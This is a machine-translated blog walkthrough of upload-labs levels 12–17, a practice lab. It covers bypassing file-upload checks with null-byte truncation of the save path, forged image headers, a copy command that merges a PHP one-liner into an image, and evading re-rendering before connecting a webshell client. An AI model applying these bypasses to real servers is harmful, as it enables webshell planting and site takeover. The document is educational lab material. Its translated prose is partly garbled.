当前位置：网站首页>Local shooting range 2- file upload vulnerability (III) - Network Security

Local shooting range 2- file upload vulnerability (III) - Network Security

2022-06-13 07:53:00 【gaog2zh】

List of articles

12、pass12- White list -%00 truncation

View source code （ part ）

...
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
...

analysis ：
- The previous code obtained the file extension by , Use whitelist filtering
- The target path of the uploaded file passes through GET Mode reference
Use ideas ：GET The ginseng , Use %00 truncation
step ：
- Normal upload suffix is jpg|png|gif Of php file
- bp Intercept , Pass the parameters shown in the figure ：
principle ：
- Conditions ：
  - php edition <5.3.4
    - Actually measured 5.3.29 It didn't work ,5.2.17 success
  - Parameters ：magic_quotes_gpc close
- stay url in %00 Express ascll In the yard 0 , and ascii in 0 Reserved as special characters , Indicates the end of the string , So when url It appears that %00 The read is considered to have ended . Truncated generation core , Namely chr(0) character . This character is not empty (Null), Nor is it an empty character (“”), Not a space ！ When the program contains chr(0) variable ,chr(0) The following data will be stopped , let me put it another way , Is mistaking it for a Terminator , The following data is ignored directly , This is the cause of the vulnerability .
Applicable conditions ： The upload path is controllable

13、pass13- White list -0x00 truncation

View source code （ part ）

...
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
...

analysis ： With other pass12, The difference is here save_path Change the path to post How to get .
Use ideas ：POST The ginseng , Use 0x00 truncation
step ：
- Normal upload suffix is jpg|png|gif Of php file
- bp Intercept
  - The way 1- Directly modifying post Parameters passed , But remember %00 Conduct url decode , Icon ：
  - Mode two -1.php Followed by any character , modify Hex Encoded as 00, Icon ：
principle ：
- Conditions
  - php edition <5.3.4
    - Actually measured 5.3.29 It didn't work ,5.2.17 success
  - Parameters ：magic_quotes_gpc close
- Same as pass12, But here the parameter passes POST Mode reception .POST Mode does not automatically decode url Encoded characters , Say to decode manually url character %00 Or by Hex Direct change to 16 It's binary 00（ namely 0x00)
Applicable conditions ： The upload path is controllable

14、pass14- Content and others - Header detection

View source code （ File header detection part ）

function getReailFileType($filename){
      
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); // read-only 2 byte 
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);    
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    switch($typeCode){
            
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

Analyze the function change function from the back of the file to the front 2 Bytes of content , Concatenation to integer , Judge whether it is... According to the numerical value jpg|png|gif One of the , Otherwise unknown

Use ideas ：
- Forge file header information
  - JPEG (jpg), The file header ：FFD8FF
  - PNG (png), The file header ：89504E47
  - GIF (gif), The file header ：47494638
- Composite picture horse
step
- Forge file header
  - Upload with php In a word php file
  - Intercept and modify file header information
  - Connect... With a kitchen knife
- Composite picture horse
  - ```
  copy 1.png /b + 1.php/a 2.png
```
- Upload
- Kitchen knife link
principle ： Each file header has its own unique identifier , By falsifying the header information of the file or synthesizing pictures , You can bypass the detection of file types through file headers , Then link through the kitchen knife

15、pass15- Content and others -getimagesize

Use the same ideas and principles as pass14,getimagesize For detailed description of the function, please refer to relevant documents by yourself

16、pass16- Content and others -exif_imagetype

Use the same ideas and principles as pass14,exif_imagetype For detailed description of the function, please refer to relevant documents by yourself

17、pass17- Content and others - Second rendering

Here we only consider the problem of second rendering .

Here we have gif Take the picture , adopt copy Command to make a picture horse , Upload , Compare before and after uploading , The second rendering will remove the Trojan horse added later .

obviously , Such pictures immediately failed to be transmitted .

Use ideas ： However, the second rendering will keep some file contents unchanged , So before making a picture horse , Let's first observe where the image will not change before and after the second rendering , Write its code into it to bypass the secondary rendering .
step ：
- utilize 010Editor The code part consistent with the uploading of the software comparison file ：
- After replacement, upload the comparison ：

This completes the bypass , Depending on the format and size of the picture , The code matches differently .

principle ： The second rendering will keep part of the code the same as the original file , Here we can insert a sentence , Connect... With a kitchen knife , Complete bypass .